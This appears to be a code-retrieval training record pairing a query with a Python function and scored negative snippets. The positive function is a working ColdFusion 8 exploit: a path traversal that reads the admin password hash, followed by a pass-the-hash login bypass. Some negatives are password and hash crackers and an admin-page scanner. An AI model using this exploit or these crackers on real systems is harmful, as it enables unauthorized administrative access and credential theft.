left_lst_copy.append(temp)\n right_lst_copy = []\n for lst in self.right_lst:\n temp = []\n for item in lst:\n temp.append(item)\n right_lst_copy.append(temp)\n\n hori_result_copy = []\n for item in self.hori_result:\n hori_result_copy.append(item)\n left_result_copy = []\n for item in self.left_result:\n left_result_copy.append(item)\n right_result_copy = []\n for item in self.right_result:\n right_result_copy.append(item)\n\n new_state.hori_lst = hori_lst_copy\n new_state.hori_result = hori_result_copy\n new_state.left_lst = left_lst_copy\n new_state.left_result = left_result_copy\n new_state.right_lst = right_lst_copy\n new_state.right_result = right_result_copy\n # update the new state with str move\n # parallel nested list data structure\n lst = [new_state.hori_lst, new_state.left_lst, new_state.right_lst]\n result = [new_state.hori_result, new_state.left_result, new_state.right_result]\n # update the cell\n for i in range(len(lst)):\n for j in range(len(lst[i])):\n for k in range(len(lst[i][j])):\n if lst[i][j][k] == move:\n # should use the player name of last state, so opposite names\n if new_state.p1_turn:\n lst[i][j][k] = \"2\"\n else:\n lst[i][j][k] = \"1\"\n # update ley-line marks\n # the ley-line may belong to a player after this move\n p1_taken = 0\n p2_taken = 0\n if result[i][j] != \"@\":\n continue\n for item in lst[i][j]:\n if item == \"1\":\n p1_taken += 1\n if item == \"2\":\n p2_taken += 1\n if float(p1_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"1\"\n if float(p2_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"2\"\n ###### CHECK FOR SHALLOW COPY PROBLEM, IF ATTRIBUTE IS UPDATE IN NEW STATE\n return new_state", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if 
board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def make_move(move, player, board):\n board[move] = player\n for d in DIRECTIONS:\n Othello.make_flips(move, player, board, d)\n return board", "def result(self, board_state, move):\n # Create a copy of the current board state\n output_state = BoardState(other_state=board_state)\n # Swap pieces\n output_state.move_piece(move)\n # Eliminate pieces\n output_state.eliminate_piece()\n return output_state" ]
[ "0.7041228", "0.6890704", "0.6870524", "0.6765509", "0.6765455", "0.67173713", "0.6701276", "0.66965497", "0.66819054", "0.6667514", "0.6663559", "0.66578156", "0.66204715", "0.657253", "0.65490776", "0.6526394", "0.6526335", "0.6520004", "0.6495556", "0.6494918", "0.6452767", "0.6435724", "0.64350605", "0.64282227", "0.64204675", "0.64192647", "0.6402228", "0.6399187", "0.63986206", "0.637706" ]
0.7599279
0
Attempts to exploit a ColdFusion file disclosure vulnerability to retrieve a hashed admin password. If the hash is found, this script produces a value that can be used to bypass the admin login, computed from the admin password hash and a ColdFusion salt input parameter.
def retrieve_hash(host, salt): password_pattern = re.compile(r'\npassword=(.+)\r') url = 'http://%s/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%%00en' % host try: response = requests.post(url) password_hash = re.search(password_pattern, response.text) if len(password_hash.groups()) > 0: password_hash = str(password_hash.groups()[0]) output_hash = generate_hash(password_hash, str(salt)) click.echo('ColdFusion 8 admin password pass-the-hash form bypass.') click.echo('Created by: [email protected]') click.echo('NOTE** Use Tamper Data or similar to set form field "cfadminPassword" to this hash value. Enjoy!') click.echo('------------------') click.echo('Result: %s' % output_hash) click.echo('------------------') else: click.secho('Unable to retrieve either password or salt value.', fg='red', bold=True) except Exception as e: click.secho('Error: %s.' % e, fg='red', bold=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pre_hash(masterpw, password, args):\n salt_hasher = hmac.new(masterpw, digestmod=DIGEST)\n\n if args.salt_url is not None:\n print(\"[INFO] Using resource at URL as salt ...\")\n with urlopen(args.salt_url) as f:\n while True:\n data = f.read(128)\n if len(data) != 0:\n salt_hasher.update(data)\n else:\n break\n\n key_len = int(math.ceil((math.log(len(default_charlist), 2) * args.len_chars) / 8))\n key = pbkdf2(password, salt_hasher.digest(),\n iter_count=args.iterations, dk_len=key_len,\n digest=DIGEST)\n return base_charlist_encode(key, default_charlist)", "def calculate_short_password_attribute(password, shared_secret, requ_auth):\n password = bytearray(password)\n shared_secret = bytearray(shared_secret)\n requ_auth = bytearray(requ_auth)\n\n\n b = bytearray(hashlib.md5(shared_secret + requ_auth).digest())\n c = xor(b, pad_with_zeros(password,16))\n return c", "def old_password (string):\n\t\n\treturn hexdigest_mySQL41prior (string)", "def _encryptDBPass():\n #run encrypt tool on user given password\n controller.CONF[\"ENCRYPTED_DB_PASS\"] = utils.encryptEngineDBPass(password=controller.CONF[\"DB_PASS\"],\n maskList=masked_value_set)", "def _migrate_admin_password():\n if os.path.exists(STORED_PASSWD):\n log('Migrating on-disk stored passwords to peer storage')\n with open(STORED_PASSWD) as fd:\n peer_store(\"admin_passwd\", fd.readline().strip('\\n'))\n\n os.unlink(STORED_PASSWD)", "def main():\n credentials = ('natas6', 'aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1')\n secret = get_secret(HOST + HOST_APPEND, credentials)[1:-2]\n if secret is not None:\n params = {'secret' : secret, 'submit': 'placeholder'}\n print('Natas7 credentials are:\\n' + KEYWORD + ':' + exploit(HOST, credentials, params))", "def checkPassword(self, password):\n # get the hash\n pswFile = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"adminPass.psw\")\n if os.path.isfile(pswFile):\n f = open(pswFile, \"r\")\n if f.mode == \"r\":\n hashedPass = f.read()\n else:\n return None\n f.close()\n ## use the default password hash if there is no password file\n else:\n hashedPass=\"7110eda4d09e062aa5e4a390b0a572ac0d2c0220\"\n\n passToCheck = (hashlib.sha1(str(password).encode('utf-8')).hexdigest())\n\n if passToCheck == hashedPass:\n return True\n else:\n return False", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def Cracker():\n attempts = 0\n flag = 0\n with open(dictionary_attack, 'r') as attack:\n print(\"Cracking password...one sec\")\n print(\"------------------------------\")\n for line in attack:\n \"\"\"\n Using a try...exception to keep attempting\n the different passwords from the wordlist\n \"\"\"\n try:\n # from the wordlist there is newline\n # they need to be stripped\n # encode passwd from str to bytes\n passwd = line.strip('\\n')\n zFile.extractall(pwd=str.encode(passwd))\n except Exception:\n attempts += 1\n pass\n else:\n print(\"Success! Password is %s\" % (passwd))\n flag = 1\n break\n print(\"Attempted %d passwords from %s wordlist\" %\n (attempts, dictionary_attack))\n if flag == 0:\n print(\"Password Cracking Failed! 
It is too strong for me :(\")", "def get_correct_pw_md5():\n f = open(PASSWORD_FILE, 'r')\n pw_md5 = f.read().strip()\n f.close()\n return pw_md5", "def hash_password(self, password):\n cmd = [\n \"snap\",\n \"run\",\n \"{}.hash-password\".format(self.synapse_snap),\n \"-c\",\n self.synapse_config,\n \"-p\",\n password,\n ]\n result = check_output(cmd)\n str_result = result.decode(\"utf-8\")\n return str_result.rstrip()", "def getpass(data, ident, hostport, dbname):\n m = hashlib.sha256()\n m.update(ident.encode())\n\n # mix in the seed (the last line) for that database, if one exists\n hostport = hostport.lower()\n dbname = dbname.lower()\n hostPortDbname = '{0}/{1}:{2}'.format(OPT_MANAGER_RESOURCES_PGAAS, hostport, dbname)\n try:\n lastLine = ''\n with open(hostPortDbname, \"r\") as fp:\n for line in fp:\n lastLine = line\n m.update(lastLine.encode())\n except IOError:\n pass\n\n m.update(base64.b64decode(data['data']))\n return m.hexdigest()", "def getpassword(value):\n hashed = \"%s%s\" % (value, SECRET_KEY)\n hasher = hashlib.md5()\n hasher.update(hashed)\n return hasher.hexdigest()[-8:]", "def validate_admin (admin_secret):\n\n try:\n admin_secret = admin_secret.encode()\n hashed = app.config['ADMIN_SECRET'].encode()\n return bcrypt.checkpw(admin_secret, hashed)\n\n except Exception as e:\n return False", "def get_password():\n\n pwd = getpass(\"Enter your password below. It is used to protect your credentials.\\n\"\n \"The password must have a minimum length of 8 characters \"\n \"and can only contain alphanumeric characters and symbols.\\n\"\n \"Enter password (will be hidden): \")\n\n tries = 0 # Limit number of invalid attempts\n while True:\n if len(pwd) >= 8 and pwd.isascii() and pwd.isprintable() and ' ' not in pwd:\n if getpass(\"Confirm password: \") == pwd:\n return pwd\n else:\n print(\"Password mismatch!\")\n else:\n print(\"Invalid characters in password or too short!\")\n\n if tries == 3: return None\n pwd = getpass(\"\\nRe-enter password: \")\n tries += 1", "def get_auth_password():\n password = AUTH_PASSWORD_SCRIPT.get()\n if password:\n return password\n return DEFAULT_AUTH_PASSWORD.get()", "def redis_pwd():\n with open(\"/etc/redis/redis.conf\") as fd:\n secret_cfg = fd.read().splitlines()\n\n for line in secret_cfg:\n line = line.strip()\n if line.startswith(\"requirepass\"):\n return line.split(\" \")[1].strip()\n return ''", "def get_user_password(text):\n return getpass.getpass(text)", "def password(self, value):\n self.password_hashed = func.crypt(value, func.gen_salt('bf'))", "def _pepper_hash(pepper, password, salt):\n return '{:0>8}{:s}{:s}'.format(pepper, password, salt)", "def testPassword(cryptPass, dictionaryFile):\n #salt = cryptPass[0:2]\n salt = crypt.mksalt(crypt.METHOD_SHA512) # Updated for SHA512 encrypted passwords\n dictFile = open(dictionaryFile, 'r')\n for word in dictFile.readlines():\n word = word.strip('\\n')\n cryptWord = crypt.crypt(word, salt)\n \n if cryptWord == cryptPass:\n print('[+] Found Password: ' + word + '\\n')\n return\n print('[-] Password Not Found.\\n')\n return", "def admin_password(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"admin_password\")", "def get_hashed_value(password):\n salt = 'saifulBoss'\n password = salt + password\n return md5(password.encode('utf-8')).hexdigest()", "def get_hashed_value(password):\n salt = 'saifulBoss'\n password = salt + password\n return md5(password.encode('utf-8')).hexdigest()", "def verify_password(stored_password, provided_password):\n #print(provided_password)\n 
salt = stored_password[:64]\n stored_password = stored_password[64:]\n pwdhash = hashlib.pbkdf2_hmac('sha512', \n provided_password.encode('utf-8'), \n salt.encode('ascii'), \n 100000)\n pwdhash = binascii.hexlify(pwdhash).decode('ascii')\n #print(pwdhash)\n return pwdhash == stored_password", "def crackHash(self, startHash):\n for col in range(self.columns, -1, -1):\n hashV = self._getFinalHash(startHash, col)\n pwdList = self._find(hashV)\n for pwd in pwdList:\n resPwd = self._findHashInChain(pwd, startHash)\n if resPwd != None:\n return resPwd\n return ''", "def scan_admin_url():\r\n target_admin_url=provided_url+\"/administrator/index.php\"\r\n if verbose_flag: print \"\\t[.] Trying to access admin login page...\", #+ target_admin_url\r\n try:\r\n response = urllib2.urlopen(target_admin_url)\r\n except HTTPError, e:\r\n admin_flag=0\r\n #print \"admin flag=\"+str(admin_flag)\r\n if verbose_flag: print \"Failed\"\r\n return admin_flag\r\n else:\r\n admin_flag=1\r\n #print \"admin flag=\"+str(admin_flag)\r\n if verbose_flag: print \"Success\"\r\n return admin_flag", "def get_password_hash(password):\n\n return pwd_context.hash(password)", "def SecondPart():\n return passwordChecker(data)" ]
[ "0.56448627", "0.55366296", "0.54568374", "0.54494023", "0.53573483", "0.533294", "0.5329196", "0.5288839", "0.52837366", "0.5233808", "0.52312523", "0.5218411", "0.51976466", "0.5186236", "0.5183251", "0.51653415", "0.5149853", "0.51409924", "0.5114079", "0.51067483", "0.5090526", "0.50880903", "0.5086922", "0.5082064", "0.5082064", "0.5081676", "0.5046229", "0.50236994", "0.5004978", "0.50004697" ]
0.6947036
0
This method starts traffic between VMs using pktgen
def start_traffic_pktgen_between_vm(
        sr_vm_fix, dst_vm_fix, dest_min_port=10000, dest_max_port=10000):
    start_traffic_pktgen(
        sr_vm_fix,
        src_min_ip=sr_vm_fix.vm_ip,
        src_max_ip=sr_vm_fix.vm_ip,
        dest_ip=dst_vm_fix.vm_ip,
        dest_min_port=dest_min_port,
        dest_max_port=dest_max_port)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def start_traffic_pktgen(\n vm_fix,\n src_min_ip='',\n src_max_ip='',\n dest_ip='',\n dest_min_port='',\n dest_max_port=''):\n vm_fix.logger.info(\"Sending traffic...\")\n try:\n cmd = '~/pktgen_new.sh %s %s %s %s %s' % (src_min_ip,\n src_max_ip,\n dest_ip,\n dest_min_port,\n dest_max_port)\n vm_fix.run_cmd_on_vm(cmds=[cmd], as_sudo=True)\n except Exception as e:\n vm_fix.logger.exception(\"Got exception at start_traffic as %s\" % (e))", "def start_net(self):\n super(FaucetTopoTestBase, self).start_net()\n # Create a dictionary of host information that might be used in a test later on.\n # This makes it easier to retrieve certain information and consolidates it into one\n # location.\n self.host_information = {}\n for host_id, host_name in self.topo.hosts_by_id.items():\n host_obj = self.net.get(host_name)\n vlan = self.host_vlans[host_id]\n ip_interface = ipaddress.ip_interface(self.host_ip_address(host_id, vlan))\n self.set_host_ip(host_obj, ip_interface)\n self.host_information[host_id] = {\n 'host': host_obj,\n 'ip': ip_interface,\n 'mac': host_obj.MAC(),\n 'vlan': vlan,\n 'bond': None,\n 'ports': {}\n }\n # Add information of hosts chosen dpid, port map values\n # TODO: This redoes logic from get_config()\n for i, dpid in enumerate(self.dpids):\n index = 1\n for host_id, links in self.host_links.items():\n if i in links:\n n_links = links.count(i)\n for _ in range(n_links):\n port = self.port_maps[dpid]['port_%d' % index]\n self.host_information[host_id]['ports'].setdefault(dpid, [])\n self.host_information[host_id]['ports'][dpid].append(port)\n index += 1\n # Store faucet vip interfaces\n self.faucet_vips = {}\n for vlan in range(self.n_vlans):\n self.faucet_vips[vlan] = ipaddress.ip_interface(self.faucet_vip(vlan))\n # Setup the linux bonds for LACP connected hosts\n self.setup_lacp_bonds()\n # Add host routes to hosts for inter vlan routing\n self.setup_intervlan_host_routes()", "def _starting(self, sender, **kwargs):\n _log.info('Starting: {}'.format(self.__name__))\n self.vip.heartbeat.start()\n # _log.debug(self.vip.ping('', \"PING ROUTER?\").get(timeout=3))\n #\n q = query.Query(self.core)\n # TODO: Use all addresses for fallback, #114\n self._external_addresses = q.query(b'addresses').get(timeout=30)\n assert self._external_addresses\n self._serverkey = q.query(b'serverkey').get(timeout=30)\n\n _log.debug(\"external addresses are: {}\".format(\n self._external_addresses\n ))\n\n # self._local_address = q.query('local_address').get(timeout=30)\n # _log.debug('Local address is? 
{}'.format(self._local_address))\n _log.info('Registering jsonrpc and /.* routes with {}'.format(\n MASTER_WEB\n ))\n\n self.vip.rpc.call(MASTER_WEB, 'register_agent_route',\n r'^/jsonrpc.*',\n self.core.identity,\n 'jsonrpc').get(timeout=10)\n\n self.vip.rpc.call(MASTER_WEB, 'register_path_route', VOLTTRON_CENTRAL,\n r'^/.*', self._webroot).get(timeout=20)\n\n self.webaddress = self.vip.rpc.call(\n MASTER_WEB, 'get_bind_web_address').get(timeout=30)\n\n # Remove so that dynamic agents don't inherit the identity.\n os.environ.pop('AGENT_VIP_IDENTITY')", "def launch_vrouter_instance(self):\n # Add code to start vrouter\n if (self.vr_args['vtest_only']):\n self.logger.info(\"VTEST_ONLY_RETURN \" +\n str(self.vr_args['vtest_only']))\n return\n cpid = os.fork()\n if cpid == 0:\n vrouter_cmd_args = [\"taskset\", self.vr_args['taskset'],\n self.vr_args['vrouter_path'], \"--no-daemon\",\n \"--no-huge\", \"--vr_packet_sz\", \"2048\"]\n if self.vr_args['dpdk_args']:\n for dpdk_arg in self.vr_args['dpdk_args'].split(' '):\n vrouter_cmd_args.append(dpdk_arg)\n vrouter_cmd_args.extend([\"--vr_socket_dir\",\n self.vr_args['socket_dir']])\n os.execvp(\"taskset\", vrouter_cmd_args)\n else:\n self.logger.info(\n \"Running cmd - taskset %s %s --no-daemon --no-huge \"\n \"--vr_packet_sz 2048 --vr_socket_dir %s\" %\n (self.vr_args['taskset'],\n self.vr_args['vrouter_path'],\n self.vr_args['socket_dir']))\n self.logger.info(\"pid = \" + str(cpid))\n self.pid = cpid\n count = 0\n ret = 0\n while (count < 10):\n cmd = \"lsof \" + self.vr_args['socket_dir'] +\\\n \"/dpdk_netlink | wc -l\"\n self.logger.info(\"Running cmd - {}\".format(cmd))\n try:\n ret = subprocess.check_output(cmd, shell=True)\n # check if the netlink is up using the ret value\n if (ret == \"2\\n\"):\n break\n else:\n time.sleep(1)\n count += 1\n except Exception as e:\n self.logger.error(e)\n time.sleep(1)\n count += 1\n if (ret != \"2\\n\"):\n self.logger.error(\"Failed to bringup vrouter\")\n return -1\n else:\n return 0", "def start_traffic(self):\n raise NotImplementedError", "def dvs_attached_ports(self):\n # Set up environment for the test\n self.show_step(1)\n\n self.env.revert_snapshot('dvs_vcenter_systest_setup')\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n os_ip = self.fuel_web.get_public_vip(cluster_id)\n os_conn = os_actions.OpenStackActions(\n os_ip, SERVTEST_USERNAME,\n SERVTEST_PASSWORD,\n SERVTEST_TENANT)\n\n tenant = os_conn.get_tenant(SERVTEST_TENANT)\n\n # Create net_1 and attach it to the default router\n self.show_step(2)\n\n net1 = os_conn.create_network(network_name=self.net_data[0].keys()[0],\n tenant_id=tenant.id)['network']\n subnet1 = os_conn.create_subnet(\n subnet_name=net1['name'],\n network_id=net1['id'],\n cidr=self.net_data[0][self.net_data[0].keys()[0]],\n ip_version=4)\n\n # Check that network is created\n assert_true(os_conn.get_network(net1['name'])['id'] == net1['id'])\n\n # Add net_1 to default router\n default_router = os_conn.neutron.list_routers()['routers'][0]\n os_conn.add_router_interface(router_id=default_router['id'],\n subnet_id=subnet1['id'])\n\n # Create security group SG1\n self.show_step(3)\n\n sg1 = os_conn.nova.security_groups.create('SG1', 'descr')\n _sg_rules = os_conn.neutron.list_security_group_rules()\n sg1_rules = [sg_rule for sg_rule in _sg_rules['security_group_rules']\n if sg_rule['security_group_id'] == sg1.id]\n for rule in sg1_rules:\n os_conn.neutron.delete_security_group_rule(rule['id'])\n for rule in [self.icmp, self.tcp]:\n 
rule[\"security_group_rule\"][\"security_group_id\"] = sg1.id\n rule[\"security_group_rule\"][\"remote_group_id\"] = sg1.id\n\n rule[\"security_group_rule\"][\"direction\"] = \"ingress\"\n os_conn.neutron.create_security_group_rule(rule)\n\n rule[\"security_group_rule\"][\"direction\"] = \"egress\"\n os_conn.neutron.create_security_group_rule(rule)\n\n default_net = os_conn.nova.networks.find(label=self.inter_net_name)\n\n # Permit all TCP and ICMP in security group default\n os_conn.goodbye_security()\n\n _groups = os_conn.neutron.list_security_groups()['security_groups']\n default_sg = [sg for sg in _groups\n if sg['tenant_id'] == tenant.id and\n sg['name'] == 'default'][0]\n\n # Launch instances with SG1 in net_1\n self.show_step(4)\n\n instances_1 = openstack.create_instances(\n os_conn=os_conn,\n nics=[{'net-id': net1['id']}],\n security_groups=[sg1.name])\n\n _, access_point_ip_1 = openstack.create_access_point(\n os_conn=os_conn,\n nics=[{'net-id': net1['id']}],\n security_groups=[default_sg['name'], sg1.name])\n\n # Launch instances with Default SG in net_1\n self.show_step(5)\n\n instances_2 = openstack.create_instances(\n os_conn=os_conn,\n nics=[{'net-id': net1['id']}],\n security_groups=[default_sg['name']])\n\n openstack.verify_instance_state(os_conn)\n\n # Verify that icmp/ssh is enabled in SG1\n self.show_step(6)\n\n ips_1 = [os_conn.get_nova_instance_ip(i, net_name=net1['name'])\n for i in instances_1]\n\n openstack.ping_each_other(ips=ips_1,\n timeout=60 * 5,\n access_point_ip=access_point_ip_1)\n\n # Verify that icmp/ssh isn't allowed between SG1 and Default SG\n self.show_step(7)\n\n ips_2 = [os_conn.get_nova_instance_ip(i, net_name=net1['name'])\n for i in instances_2]\n ip_pairs = {ip: ips_2 for ip in ips_1}\n openstack.check_connection_through_host(remote=access_point_ip_1,\n timeout=60,\n ip_pair=ip_pairs,\n result_of_command=1)\n\n # Detach ports of all instances from net_1\n self.show_step(8)\n # Attach ports of all instances to default internal net\n self.show_step(9)\n\n for instance in instances_1:\n ip = os_conn.get_nova_instance_ip(instance, net_name=net1['name'])\n port = [p for p in os_conn.neutron.list_ports()['ports']\n if p['fixed_ips'][0]['ip_address'] == ip].pop()\n instance.interface_detach(port['id'])\n instance.interface_attach(None, default_net.id, None)\n instance.reboot() # instead of network restart\n\n # Check that all instances are in Default SG\n self.show_step(10)\n\n ips_1 = []\n instances_1 = [instance for instance in os_conn.nova.servers.list()\n if instance.id in [inst.id for inst in instances_1]]\n for instance in instances_1:\n assert_true(instance.security_groups.pop()['name'] == 'default')\n ips_1.append(os_conn.get_nova_instance_ip(\n srv=instance, net_name=self.inter_net_name))\n\n # Verify that icmp/ssh is enabled between instances (in Default SG)\n self.show_step(11)\n\n _, access_point_ip_2 = openstack.create_access_point(\n os_conn=os_conn,\n nics=[{'net-id': default_net.id}],\n security_groups=[default_sg['name']])\n\n openstack.ping_each_other(ips=ips_1 + ips_2,\n timeout=60,\n access_point_ip=access_point_ip_2)\n\n # Change for some instances Default SG to SG1\n self.show_step(12)\n\n for instance in instances_1:\n instance.remove_security_group('default')\n instance.add_security_group(sg1.name)\n\n # Verify that icmp/ssh is enabled in SG1\n self.show_step(13)\n\n openstack.ping_each_other(ips=ips_1,\n timeout=60,\n access_point_ip=access_point_ip_1)\n\n # Verify that icmp/ssh isn't allowed between SG1 and Default SG\n 
self.show_step(14)\n\n ip_pairs = {ip: ips_2 for ip in ips_1}\n openstack.check_connection_through_host(remote=access_point_ip_1,\n timeout=60,\n ip_pair=ip_pairs,\n result_of_command=1)", "def start_pcap(host, pcap_file_name, interface, pcap_args='',\n func_ip=None, tool_path=None):\n with LydianClient(_get_host_ip(host, func_ip)) as client:\n client.pcap.start_pcap(pcap_file_name, interface, pcap_args, tool_path)", "def Bg_ping_start(host, options):\r\n BgPing.start_traffic(host, options)", "def pkt_gen(self):\n for i in range(self.num_pkts):\n # create the test packets\n pkt = Ether()/IP()/TCP()/'hello there pretty world!!!'\n rank = random.sample(range(0, 100), 1)[0]\n pkt_id = i\n tuser = Tuser(len(pkt), 0b00000001, 0b00000100, rank, pkt_id)\n print ('@ {:.2f} - Send: {} || {}'.format(self.env.now, pkt.summary(), tuser))\n # write the pkt and metadata into storage\n self.pkt_in_pipe.put((pkt, tuser))\n\n # wait for 10 cycles\n #for j in range(PREAMBLE + len(pkt) + IFG):\n yield self.wait_line_clks(self.PREAMBLE + len(pkt) + self.IFG)", "def set_up_all(self):\n # Based on h/w type, choose how many ports to use\n self.dut_ports = self.dut.get_ports(self.nic)\n # Verify that enough ports are available\n self.verify(len(self.dut_ports) >= 1, \"Insufficient ports\")\n\n localPort = self.tester.get_local_port(self.dut_ports[0])\n self.tester_itf = self.tester.get_interface(localPort)\n self.tester_mac = self.tester.get_mac(localPort)\n self.pf_interface = self.dut.ports_info[self.dut_ports[0]]['intf']\n self.pf_mac = self.dut.get_mac_address(0)\n self.pf_pci = self.dut.ports_info[self.dut_ports[0]]['pci']\n self.pmdout = PmdOutput(self.dut)\n self.cores = \"1S/2C/1T\"\n self.pkt1 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.2')/SCTP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.pkt2 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.2')/UDP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt3 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.3')/TCP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt4 = \"Ether(dst='%s')/IP(src='10.0.0.1',dst='192.168.0.2')/('X'*48)\" % self.pf_mac\n self.pkt5 = \"Ether(dst='%s')/IPv6(src='2001::1',dst='2001::2',nh=132)/SCTP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.pkt6 = \"Ether(dst='%s')/IPv6(src='2001::1',dst='2001::2')/UDP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt7 = \"Ether(dst='%s')/IPv6(src='2001::2',dst='2001::3')/TCP(dport=50, sport=50)/('X'*48)\" % self.pf_mac\n self.pkt8 = \"Ether(dst='%s')/IPv6(src='2001::2',dst='2001::3')/('X'*48)\" % self.pf_mac\n self.prio_pkt1 = \"Ether(dst='%s')/Dot1Q(prio=1)/IP(src='10.0.0.1',dst='192.168.0.2')/TCP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.prio_pkt2 = \"Ether(dst='%s')/Dot1Q(prio=2)/IP(src='10.0.0.1',dst='192.168.0.2')/TCP(dport=80, sport=80)/('X'*48)\" % self.pf_mac\n self.prio_pkt3 = \"Ether(dst='%s')/Dot1Q(prio=3)/IP(src='10.0.0.1',dst='192.168.0.2')/TCP(dport=80, sport=80)/('X'*48)\" % self.pf_mac", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index, enable_ip6=True\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10,\n is_ip6=1,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10000,\n is_ip6=1,\n )\n self.logger.debug(self.vapi.ppcli(\"show ip6-full-reassembly details\"))\n 
self.logger.debug(self.vapi.ppcli(\"show buffers\"))", "def start_network(self):\n try:\n self.topo.build_topo()\n except:\n error('Cannot build the topology.')\n try:\n self.net = IPNet(topo=self.topo, use_v4=False, use_v6=True)\n self.net.start()\n except:\n self.stop_network()\n error('Cannot start the network.')", "def CASE1( self, main ):\n\n from tests.USECASE.SegmentRouting.SRRouting.dependencies.SRRoutingTest import SRRoutingTest\n\n SRRoutingTest.runTest( main,\n test_idx=1,\n onosNodes=3,\n dhcp=1,\n routers=1,\n ipv4=1,\n ipv6=0,\n countFlowsGroups=False,\n linkFailure=False,\n description=\"Ping between all ipv4 hosts in the topology\" )", "def do_startstcv(self, args):\n if not self._assert_login():\n return\n\n vm_image = None\n ttl_minutes = 60\n socket = False\n desc = None\n instances = 2\n host = None\n cores = 1\n memory = None\n vlan = None\n ntp_server = None\n license_server = None\n share = True\n static_ip = None\n netmask = None\n gateway = None\n external = False\n\n if args:\n args = args.split()\n missing_arg = 'missing value after'\n while args:\n arg = args.pop(0)\n if arg in ('-i', '--image'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n vm_image = args.pop(0)\n elif arg in ('-t', '--ttl'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n ttl_minutes = int(args.pop(0))\n elif arg in ('-d', '--desc'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n desc = args.pop(0)\n elif arg in ('-n', '--number'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n instances = int(args.pop(0))\n elif arg in ('-h', '--host'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n host = args.pop(0)\n elif arg in ('-c', '--cores'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n cores = int(args.pop(0))\n elif arg in ('-m', '--memory'):\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n memory = int(args.pop(0))\n elif arg == '--socket':\n socket = True\n elif arg == '--vlan':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n vlan = int(args.pop(0))\n elif arg == '--ntp':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n ntp_server = 